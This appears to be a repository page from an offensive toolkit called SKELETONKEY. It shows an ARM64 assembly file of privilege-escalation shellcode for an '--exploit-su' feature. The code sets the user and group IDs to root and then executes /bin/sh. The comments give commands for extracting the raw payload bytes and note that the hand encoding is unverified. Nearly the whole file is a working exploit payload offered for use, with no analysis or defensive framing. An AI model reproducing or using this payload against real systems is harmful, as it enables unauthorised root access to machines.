leviathan/SKELETONKEY
1
0
Fork 0
Code Issues Pull Requests Actions 21 Packages Projects Releases Wiki Activity
Files
main
SKELETONKEY/modules/copy_fail_family/tools/exploit_su_aarch64.S
T

74 lines
3.0 KiB
ArmAsm
Raw Permalink Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
/*
* DIRTYFAIL aarch64 (ARM64) shellcode for --exploit-su
*
* Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded
* for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
* `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes total.
*
* Build for byte-extraction:
*
* aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S
* aarch64-linux-gnu-objcopy -O binary -j .text \
* exploit_su_aarch64.o exploit_su_aarch64.bin
* xxd -i exploit_su_aarch64.bin
*
* The resulting byte array should match `shellcode_aarch64[]` in
* `src/exploit_su.c`. If it doesn't, the C array is wrong and needs
* to be regenerated from this source.
*
* Functional equivalent (in C-like pseudocode):
*
* setuid(0);
* setgid(0);
* execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
*
* STATUS: HAND-ENCODED VERIFY BEFORE DEPLOYING TO PRODUCTION.
* The byte array in src/exploit_su.c was produced by manually
* cross-referencing each instruction against the ARMv8-A reference
* manual; no aarch64 hardware was available to run the resulting
* shellcode end-to-end. Use this .S file to regenerate via the
* assembler if you need confidence.
*/
.text
.global _start
_start:
/* setuid(0) — syscall 146 (0x92) on aarch64 */
movz x0, #0 /* d2 80 00 00 */
movz x8, #146 /* d2 80 12 48 */
svc #0 /* d4 00 00 01 */
/* setgid(0) — syscall 144 (0x90) */
movz x0, #0 /* d2 80 00 00 */
movz x8, #144 /* d2 80 12 08 */
svc #0 /* d4 00 00 01 */
/* Build "/bin/sh\0" in x9.
*
* As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f
* bits 0..15 = 0x622f (chars '/' 'b' in low->high order)
* bits 16..31 = 0x6e69
* bits 32..47 = 0x732f
* bits 48..63 = 0x0068
*/
movz x9, #0x622f /* d2 8c 45 e9 */
movk x9, #0x6e69, lsl #16 /* f2 ad cd 29 */
movk x9, #0x732f, lsl #32 /* f2 ce 65 e9 */
movk x9, #0x0068, lsl #48 /* f2 e0 0d 09 */
/* Push the string to the stack (sp -= 16; [sp] = x9). */
str x9, [sp, #-16]! /* f8 1f 0f e9 */
mov x9, sp /* 91 00 03 e9 string ptr */
/* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */
sub sp, sp, #16 /* d1 00 43 ff */
str xzr, [sp, #8] /* f9 00 07 ff argv[1] = NULL */
str x9, [sp, #0] /* f9 00 03 e9 argv[0] = ptr */
/* execve(pathname=x9, argv=sp, envp=NULL) — syscall 221 (0xdd) */
mov x0, x9 /* aa 09 03 e0 */
mov x1, sp /* 91 00 03 e1 */
mov x2, xzr /* aa 1f 03 e2 */
movz x8, #221 /* d2 80 1b a8 */
svc #0 /* d4 00 00 01 */
Reference in New Issue View Git Blame Copy Permalink